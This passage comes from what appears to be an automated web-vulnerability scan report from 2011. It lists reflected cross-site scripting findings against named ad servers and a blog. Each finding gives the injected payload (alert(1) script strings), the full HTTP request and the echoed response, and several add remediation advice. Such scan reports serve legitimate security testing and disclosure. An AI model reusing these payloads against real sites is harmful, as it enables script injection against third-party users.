...[SNIP]...
AA.WQgAAAAAAAIAAwAAAAAAo7y1Ci4BAAAAAAAAADY5YjJkMWZjLTM0NTQtMTFlMC04NjBiLTAwMWIyNDc4NGE2MgAzmSoAAAA=,,http%3A%2F%2Fspeckyboy.com%2F,$http://t.invitemedia.com/track_click?auctionID=1297259805974763-839613e2e6"-alert(1)-"2470cde73b&campID=64090&crID=83961&pubICode=2076749&pub=281215&partnerID=38&url=http%3A%2F%2Fspeckyboy%2Ecom%2F&redirectURL=http%3a%2f%2fpersonalsavings.americanexpress.com/savings-product.html");
var wmode = "o
...[SNIP]...

1.15. http://ad.doubleclick.net/adi/N553.martinimedianet/B4970757.3 [url parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N553.martinimedianet/B4970757.3

Issue detail

The value of the url request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8eed4"-alert(1)-"3d107a4253e was submitted in the url parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N553.martinimedianet/B4970757.3;sz=728x90;click=http://ad.technoratimedia.com/clk?2,13%3Bbc1ea512b36e66d9%3B12e0ab5bca4,0%3B%3B%3B2343140080,XL5IAKvfDgD0zXgAAAAAABnVHgAAAAAAAgAAAAYAAAAAAP8AAAAECIhvGwAAAAAATbAfAAAAAADfpSgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA.WQgAAAAAAAIAAwAAAAAAo7y1Ci4BAAAAAAAAADY5YjJkMWZjLTM0NTQtMTFlMC04NjBiLTAwMWIyNDc4NGE2MgAzmSoAAAA=,,http%3A%2F%2Fspeckyboy.com%2F,$http://t.invitemedia.com/track_click?auctionID=1297259805974763-83961&campID=64090&crID=83961&pubICode=2076749&pub=281215&partnerID=38&url=http%3A%2F%2Fspeckyboy%2Ecom%2F8eed4"-alert(1)-"3d107a4253e&redirectURL=;pc=[TPAS_ID];ord=1297259805? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://ad.yieldmanager.com/iframe3?XL5IAKvfDgD0zXgAAAAAABnVHgAAAAAAAgAAAAYAAAAAAP8AAAAECIhvGwAAAAAATbAfAAAAAADfpSgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA.WQgAAAAAAAIAAwAAAAAAjdtoAG.BBkBUMCqpE9AKQGQQWDm0SBlAl24Sg8DKHUDOzMzMzMwZQGZmZmZmZh5AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADepf-VloGbCY5JXkJ8yQxUfqcfWMMwttvYibDSAAAAAA==,,http%3A%2F%2Fspeckyboy.com%2F,Z%3D728x90%26atf%3D0%26brw%3Dcr3%26efo%3D0%26os%3Dwn7%26pfm%3D1%26prm%3D0%26rtg%3Dga%26s%3D974763%26tblg%3Dch%26titn%3Dch%26tphv%3Dch%26ttch%3Dch%26uatRandNo%3D50691%26_salt%3D3626026624%26B%3D10%26u%3Dhttp%253A%252F%252Fspeckyboy.com%252F%26r%3D1,69b2d1fc-3454-11e0-860b-001b24784a62
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|2206715/621812/15013,189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 09 Feb 2011 13:59:20 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 7280

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template Id = 13,901 Template Name = Banner Creative (Flash) - In Page
...[SNIP]...
http%3A%2F%2Fspeckyboy.com%2F,$http://t.invitemedia.com/track_click?auctionID=1297259805974763-83961&campID=64090&crID=83961&pubICode=2076749&pub=281215&partnerID=38&url=http%3A%2F%2Fspeckyboy%2Ecom%2F8eed4"-alert(1)-"3d107a4253e&redirectURL=http%3a%2f%2fpersonalsavings.americanexpress.com/savings-product.html");
var wmode = "opaque";
var bg = "same as SWF";
var dcallowscriptaccess = "never";

var openWindow = "false";
var win
...[SNIP]...

1.16. http://ad.doubleclick.net/adj/N6457.133080.LOTAME/B4840137 [click0 parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N6457.133080.LOTAME/B4840137

Issue detail

The value of the click0 request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2beb5'-alert(1)-'e161e8ec7a7 was submitted in the click0 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N6457.133080.LOTAME/B4840137;click0=2beb5'-alert(1)-'e161e8ec7a7 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://twittorati.com/?7903e'%3balert(1)//5a7f48cb57e=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|2206715/621812/15013,189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 273
Cache-Control: no-cache
Pragma: no-cache
Date: Wed, 09 Feb 2011 14:10:10 GMT
Expires: Wed, 09 Feb 2011 14:10:10 GMT

document.write('<a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3aa9/14/1c/%2a/y;44306;0-0;0;58835764;1-468/60;0/0/0;;~sscs=%3f2beb5'-alert(1)-'e161e8ec7a7"><img src="http://s0.2mdn.net/
...[SNIP]...

1.17. http://ad.doubleclick.net/adj/N6457.133080.LOTAME/B4840137.2 [click0 parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N6457.133080.LOTAME/B4840137.2

Issue detail

The value of the click0 request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload eb169'-alert(1)-'a0fee229f25 was submitted in the click0 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N6457.133080.LOTAME/B4840137.2;click0=eb169'-alert(1)-'a0fee229f25 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://twittorati.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|2206715/621812/15013,189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 273
Cache-Control: no-cache
Pragma: no-cache
Date: Wed, 09 Feb 2011 14:08:19 GMT
Expires: Wed, 09 Feb 2011 14:08:19 GMT

document.write('<a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3aa9/14/1c/%2a/k;44306;0-0;0;58835784;1-468/60;0/0/0;;~sscs=%3feb169'-alert(1)-'a0fee229f25"><img src="http://s0.2mdn.net/
...[SNIP]...

1.18. http://ad.doubleclick.net/adj/cm.appnexus/nikon_ron_cpm [sz parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/cm.appnexus/nikon_ron_cpm

Issue detail

The value of the sz request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload bb425'%3balert(1)//e1a90e0f65e was submitted in the sz parameter. This input was echoed as bb425';alert(1)//e1a90e0f65e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/cm.appnexus/nikon_ron_cpm;sz=bb425'%3balert(1)//e1a90e0f65e HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://ib.adnxs.com/if?enc=AQAAAAAA4j-amZmZmZnePwAAAADXo_o_mpmZmZmZ3j8AAAAAAADiP9xIJgq8hAUXBWHfHSmrEEI7n1JNAAAAABuRAwA2AQAANwEAAAIAAABJ9wIA5GoAAAEAAABVU0QAVVNEAKAAWAKoAecEDAcAAgUCAAIAAAAARR2NVAAAAAA.&udj=uf%28%27a%27%2C+11322%2C+1297260347%29%3Buf%28%27c%27%2C+49259%2C+1297260347%29%3Buf%28%27r%27%2C+194377%2C+1297260347%29%3B&cnd=!hhQ2PQjrgAMQye4LGAAg5NUBKOcJMQAAAAAAAOI_QhMIABAAGAAgASj-__________8BSABQAFioA2AAaLcC&referrer=http://technorati.com/contact-us/&custom_macro=SEG_CODES_COL%5Ebtg=an.5%3Bbtg=an.51%3Bbtg=cm.de16_1%3Bbtg=cm.de18_1%3Bbtg=cm.ent_h%3Bbtg=cm.polit_h%3Bbtg=cm.shop_h%3Bbtg=cm.sports_h%3Bbtg=cm.sportsfan%3Bbtg=cm.sportsreg
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|2206715/621812/15013,189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 295
Cache-Control: no-cache
Pragma: no-cache
Date: Wed, 09 Feb 2011 14:09:37 GMT
Expires: Wed, 09 Feb 2011 14:09:37 GMT

document.write('<a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3aa9/0/0/%2a/v;44306;0-0;0;59862846;255-0/0;0/0/0;;~okv=;sz=bb425';alert(1)//e1a90e0f65e;~aopt=2/0/ee/0;~sscs=%3f"><img sr
...[SNIP]...

1.19. http://ad.doubleclick.net/adj/cm.appnexus/taxact_ron [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/cm.appnexus/taxact_ron

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 848f6'-alert(1)-'c4eace39569 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/cm.appnexus/taxact_ron;sz=300x250;app=taxact_ron;click0=http://ib.adnxs.com/click/hetRuB6F0z8IrBxaZDvPPwAAAMAeheQ_CKwcWmQ7zz-F61G4HoXTP5b8K_pSC9QXBWHfHSmrEEI6n1JNAAAAAGqUAwA2AQAANwEAAAIAAAAmgQIA52oAAAEAAABVU0QAVVNEACwB-gCoAdoEbwQAAQUCAAMAAAAAASH0uQAAAAA./cnd=!ICL11Qi52wIQpoIKGAAg59UBKNoJMYXrUbgehdM_QhMIABAAGAAgASj-__________8BQg0I4D4QhscEGAEgAygCQgsI4D4QABgAIAIoAkINCOE-EPK3TRgTIAMoAkILCOE-EAAYACACKAJIAFAAWKgDYABotwI./referrer=http%3A%2F%2Fblogcritics.org%2F/clickenc=;ord=1297260346?&848f6'-alert(1)-'c4eace39569=1 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://ib.adnxs.com/if?enc=hetRuB6F0z8IrBxaZDvPPwAAAMAeheQ_CKwcWmQ7zz-F61G4HoXTP5b8K_pSC9QXBWHfHSmrEEI6n1JNAAAAAGqUAwA2AQAANwEAAAIAAAAmgQIA52oAAAEAAABVU0QAVVNEACwB-gCoAdoEbwQAAgUCAAMAAAAAAiEFugAAAAA.&udj=uf%28%27a%27%2C+6877%2C+1297260346%29%3Buf%28%27c%27%2C+44473%2C+1297260346%29%3Buf%28%27r%27%2C+164134%2C+1297260346%29%3Bppv%288032%2C+%271717009808947412118%27%2C+1297260346%2C+1297692346%2C+44473%2C+27367%29%3Bppv%288033%2C+%271717009808947412118%27%2C+1297260346%2C+1297692346%2C+44473%2C+27367%29%3B&cnd=!ICL11Qi52wIQpoIKGAAg59UBKNoJMYXrUbgehdM_QhMIABAAGAAgASj-__________8BQg0I4D4QhscEGAEgAygCQgsI4D4QABgAIAIoAkINCOE-EPK3TRgTIAMoAkILCOE-EAAYACACKAJIAFAAWKgDYABotwI.&referrer=http://blogcritics.org/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|2206715/621812/15013,189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Wed, 09 Feb 2011 14:09:22 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 1251

document.write('<a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3aa9/14/19f/%2a/r;234941401;0-0;1;58796878;4307-300/250;40248019/40265806/1;;~okv=;sz=300x250;app=taxact_ron;click0=http:/
...[SNIP]...
1Qi52wIQpoIKGAAg59UBKNoJMYXrUbgehdM_QhMIABAAGAAgASj-__________8BQg0I4D4QhscEGAEgAygCQgsI4D4QABgAIAIoAkINCOE-EPK3TRgTIAMoAkILCOE-EAAYACACKAJIAFAAWKgDYABotwI./referrer=http://blogcritics.org//clickenc=;;848f6'-alert(1)-'c4eace39569=1;~aopt=2/0/ee/0;~sscs=%3fhttp://ib.adnxs.com/click/hetRuB6F0z8IrBxaZDvPPwAAAMAeheQ_CKwcWmQ7zz-F61G4HoXTP5b8K_pSC9QXBWHfHSmrEEI6n1JNAAAAAGqUAwA2AQAANwEAAAIAAAAmgQIA52oAAAEAAABVU0QAVVNEACwB-gCoAdoEbwQA
...[SNIP]...

1.20. http://ad.doubleclick.net/adj/cm.appnexus/taxact_ron [sz parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/cm.appnexus/taxact_ron

Issue detail

The value of the sz request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload fc312'%3balert(1)//b6400693fbc was submitted in the sz parameter. This input was echoed as fc312';alert(1)//b6400693fbc in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/cm.appnexus/taxact_ron;sz=fc312'%3balert(1)//b6400693fbc HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://ib.adnxs.com/if?enc=hetRuB6F0z8IrBxaZDvPPwAAAMAeheQ_CKwcWmQ7zz-F61G4HoXTP5b8K_pSC9QXBWHfHSmrEEI6n1JNAAAAAGqUAwA2AQAANwEAAAIAAAAmgQIA52oAAAEAAABVU0QAVVNEACwB-gCoAdoEbwQAAgUCAAMAAAAAAiEFugAAAAA.&udj=uf%28%27a%27%2C+6877%2C+1297260346%29%3Buf%28%27c%27%2C+44473%2C+1297260346%29%3Buf%28%27r%27%2C+164134%2C+1297260346%29%3Bppv%288032%2C+%271717009808947412118%27%2C+1297260346%2C+1297692346%2C+44473%2C+27367%29%3Bppv%288033%2C+%271717009808947412118%27%2C+1297260346%2C+1297692346%2C+44473%2C+27367%29%3B&cnd=!ICL11Qi52wIQpoIKGAAg59UBKNoJMYXrUbgehdM_QhMIABAAGAAgASj-__________8BQg0I4D4QhscEGAEgAygCQgsI4D4QABgAIAIoAkINCOE-EPK3TRgTIAMoAkILCOE-EAAYACACKAJIAFAAWKgDYABotwI.&referrer=http://blogcritics.org/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|2206715/621812/15013,189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 295
Cache-Control: no-cache
Pragma: no-cache
Date: Wed, 09 Feb 2011 14:09:18 GMT
Expires: Wed, 09 Feb 2011 14:09:18 GMT

document.write('<a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3aa9/0/0/%2a/x;44306;0-0;0;58796878;255-0/0;0/0/0;;~okv=;sz=fc312';alert(1)//b6400693fbc;~aopt=2/0/ee/0;~sscs=%3f"><img sr
...[SNIP]...

1.21. http://ad.media6degrees.com/adserv/cs [adType parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.media6degrees.com
Path:   /adserv/cs

Issue detail

The value of the adType request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 467de"><script>alert(1)</script>0330d190362 was submitted in the adType parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adserv/cs?adType=iframe|is_preview=0|cId=4814|ec=1|spId=19013|advId=651|tpCId=153250|exId=9|price=0.200000|vurlId=424|srcUrlEnc=http://technorati.com/contact-us/?bd8fa%22%3E%3Cscript%3Ealert(1)%3C/script%3E09ae0dbaead=1|notifyServer=asd132.sd.pl.pvt|notifyPort=8080|bid=0.20000000298023224|tId=6210453202168737|pubId=51|invId=117|secId=56|tpSecId=233753|foo=bar|cb=1297260612|ctrack=http://ib.adnxs.com/click/AQAAoJmZyT-amZlhj8LFPwAAAKCZmfE_mpmZYY_CxT8AAACgmZnJP8giKVhwODcdBWHfHSmrEEJEoFJNAAAAABmRAwA2AQAAfAAAABkAAACiVgIA5GoAAAEAAABVU0QAVVNEACwB-gCoAecEoQMAAgUCAAIAAAAAMiEewAAAAAA./cnd=%257B%255C%2522m6ClientId%255C%2522:835342505348660275,%255C%2522transactionId%255C%2522:6210453202168737,%255C%2522marketerId%255C%2522:651,%255C%2522campaignId%255C%2522:3231,%255C%2522spendId%255C%2522:19013,%255C%2522spendWeight%255C%2522:200,%255C%2522creativeId%255C%2522:4814,%255C%2522spendCreativeId%255C%2522:158392,%255C%2522adProfileId%255C%2522:289%257D/referrer=http%253A%252F%252Ftechnorati.com%252Fcontact-us%252F%253Fbd8fa%252522%25253E%25253Cscript%25253Ealert%25281%2529%25253C%252Fscript%25253E09ae0dbaead%253D1/clickenc=467de"><script>alert(1)</script>0330d190362 HTTP/1.1
Host: ad.media6degrees.com
Proxy-Connection: keep-alive
Referer: http://technorati.com/contact-us/?bd8fa%22%3E%3Cscript%3Ealert(1)%3C/script%3E09ae0dbaead=1
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: CP="COM NAV INT STA NID OUR IND NOI"
Pragma: no-cache
Cache-Control: no-cache
Set-Cookie: adh="1lf17qo16033e7s0103901WEF/RAmuh01bkz326030103i01pznOhAUUE00cpvo3fus0122d01zfQfEf5HA000000"; Version=1; Domain=media6degrees.com; Max-Age=15552000; Path=/
Set-Cookie: clid=2lebnns011706ch47d7o8wtv2151z01i1404070g20p; Domain=media6degrees.com; Expires=Mon, 08-Aug-2011 14:10:39 GMT; Path=/
Set-Cookie: orblb=2lfk1rn0225810u020lxik0hlmv2dh10u0100000; Domain=media6degrees.com; Expires=Mon, 08-Aug-2011 14:10:39 GMT; Path=/
Content-Type: text/html;charset=ISO-8859-1
Date: Wed, 09 Feb 2011 14:10:39 GMT
Content-Length: 1602

<a href="http://ad.media6degrees.com/adserv/clk?tId=6210453202168737|cId=4814|cb=1297260612|notifyPort=8080|tpCId=153250|exId=9|tId=6210453202168737|foo=bar|tpSecId=233753|ec=1|vurlId=424|secId=56|pri
...[SNIP]...
ofileId%255C%2522:289%257D/referrer=http%253A%252F%252Ftechnorati.com%252Fcontact-us%252F%253Fbd8fa%252522%25253E%25253Cscript%25253Ealert%25281%2529%25253C%252Fscript%25253E09ae0dbaead%253D1/clickenc=467de"><script>alert(1)</script>0330d190362http://roia.biz/im/n/KSmZvq1BAAGL30MAAAsXQgAAqVNmMQA-A/" target="_blank">
...[SNIP]...

1.22. http://ad.media6degrees.com/adserv/cs [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.media6degrees.com
Path:   /adserv/cs

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f4b38"><script>alert(1)</script>ad4afdf7ec was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adserv/cs?adType=iframe|is_preview=0|cId=4814|ec=1|spId=19013|advId=651|tpCId=153250|exId=9|price=0.200000|vurlId=424|srcUrlEnc=http://technorati.com/contact-us/?bd8fa%22%3E%3Cscript%3Ealert(1)%3C/script%3E09ae0dbaead=1|notifyServer=asd132.sd.pl.pvt|notifyPort=8080|bid=0.20000000298023224|tId=6210453202168737|pubId=51|invId=117|secId=56|tpSecId=233753|foo=bar|cb=1297260612|ctrack=http://ib.adnxs.com/click/AQAAoJmZyT-amZlhj8LFPwAAAKCZmfE_mpmZYY_CxT8AAACgmZnJP8giKVhwODcdBWHfHSmrEEJEoFJNAAAAABmRAwA2AQAAfAAAABkAAACiVgIA5GoAAAEAAABVU0QAVVNEACwB-gCoAecEoQMAAgUCAAIAAAAAMiEewAAAAAA./cnd=%257B%255C%2522m6ClientId%255C%2522:835342505348660275,%255C%2522transactionId%255C%2522:6210453202168737,%255C%2522marketerId%255C%2522:651,%255C%2522campaignId%255C%2522:3231,%255C%2522spendId%255C%2522:19013,%255C%2522spendWeight%255C%2522:200,%255C%2522creativeId%255C%2522:4814,%255C%2522spendCreativeId%255C%2522:158392,%255C%2522adProfileId%255C%2522:289%257D/referrer=http%253A%252F%252Ftechnorati.com%252Fcontact-us%252F%253Fbd8fa%252522%25253E%25253Cscript%25253Ealert%25281%2529%25253C%252Fscript%25253E09ae0dbaead%253D1/clickenc=&f4b38"><script>alert(1)</script>ad4afdf7ec=1 HTTP/1.1
Host: ad.media6degrees.com
Proxy-Connection: keep-alive
Referer: http://technorati.com/contact-us/?bd8fa%22%3E%3Cscript%3Ealert(1)%3C/script%3E09ae0dbaead=1
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: CP="COM NAV INT STA NID OUR IND NOI"
Pragma: no-cache
Cache-Control: no-cache
Set-Cookie: adh="1lf17qo16033e7s0103901WEF/RAmuh01bkz326030103i01pznOhAUUE00cpvo3fus0122d01zfQfEf5HA000000"; Version=1; Domain=media6degrees.com; Max-Age=15552000; Path=/
Set-Cookie: clid=2lebnns011706ch47d7o8wtv2151z01i1404070g20p; Domain=media6degrees.com; Expires=Mon, 08-Aug-2011 14:10:39 GMT; Path=/
Set-Cookie: orblb=2lfk1rn0225810u020lxik0hlmv2dh10u0100000; Domain=media6degrees.com; Expires=Mon, 08-Aug-2011 14:10:39 GMT; Path=/
Content-Type: text/html;charset=ISO-8859-1
Date: Wed, 09 Feb 2011 14:10:39 GMT
Content-Length: 1604

<a href="http://ad.media6degrees.com/adserv/clk?tId=6210453202168737|cId=4814|cb=1297260612|notifyPort=8080|tpCId=153250|exId=9|tId=6210453202168737|foo=bar|tpSecId=233753|ec=1|vurlId=424|secId=56|pri
...[SNIP]...
fileId%255C%2522:289%257D/referrer=http%253A%252F%252Ftechnorati.com%252Fcontact-us%252F%253Fbd8fa%252522%25253E%25253Cscript%25253Ealert%25281%2529%25253C%252Fscript%25253E09ae0dbaead%253D1/clickenc=&f4b38"><script>alert(1)</script>ad4afdf7ec=1http://roia.biz/im/n/KSmZvq1BAAGL30MAAAsXQgAAqVNmMQA-A/" target="_blank">
...[SNIP]...

1.23. http://ad.technoratimedia.com/st [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.technoratimedia.com
Path:   /st

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e7709"-alert(1)-"ffdd1267572 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /st?pfm=1&tblg=ch&tphv=ch&ttch=ch&titn=ch&rtg=ga&brw=cr3&os=wn7&prm=0&efo=0&atf=0&uatRandNo=50691&ad_type=ad&section=974763&ad_size=728x90&e7709"-alert(1)-"ffdd1267572=1 HTTP/1.1
Host: ad.technoratimedia.com
Proxy-Connection: keep-alive
Referer: http://speckyboy.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Wed, 09 Feb 2011 13:58:25 GMT
Server: YTS/1.18.4
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Cache-Control: no-store
Last-Modified: Wed, 09 Feb 2011 13:58:25 GMT
Pragma: no-cache
Content-Length: 4420
Age: 0
Proxy-Connection: close

/* All portions of this software are copyright (c) 2003-2006 Right Media*/var rm_ban_flash=0;var rm_url="";var rm_pop_frequency=0;var rm_pop_id=0;var rm_pop_times=0;var rm_pop_nofreqcap=0;var rm_passback=0;var rm_tag_type="";rm_tag_type = "ad"; rm_url = "http://ad.technoratimedia.com/imp?Z=728x90&atf=0&brw=cr3&e7709"-alert(1)-"ffdd1267572=1&efo=0&os=wn7&pfm=1&prm=0&rtg=ga&s=974763&tblg=ch&titn=ch&tphv=ch&ttch=ch&uatRandNo=50691&_salt=4091159364";var RM_POP_COOKIE_NAME='ym_pop_freq';var RM_INT_COOKIE_NAME='ym_int_freq';if(!window.rm_cre
...[SNIP]...

1.24. http://addyosmani.com/blog/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://addyosmani.com
Path:   /blog/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 96792"><script>alert(1)</script>e6f5e4a121f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 96792\"><script>alert(1)</script>e6f5e4a121f in the application's response.

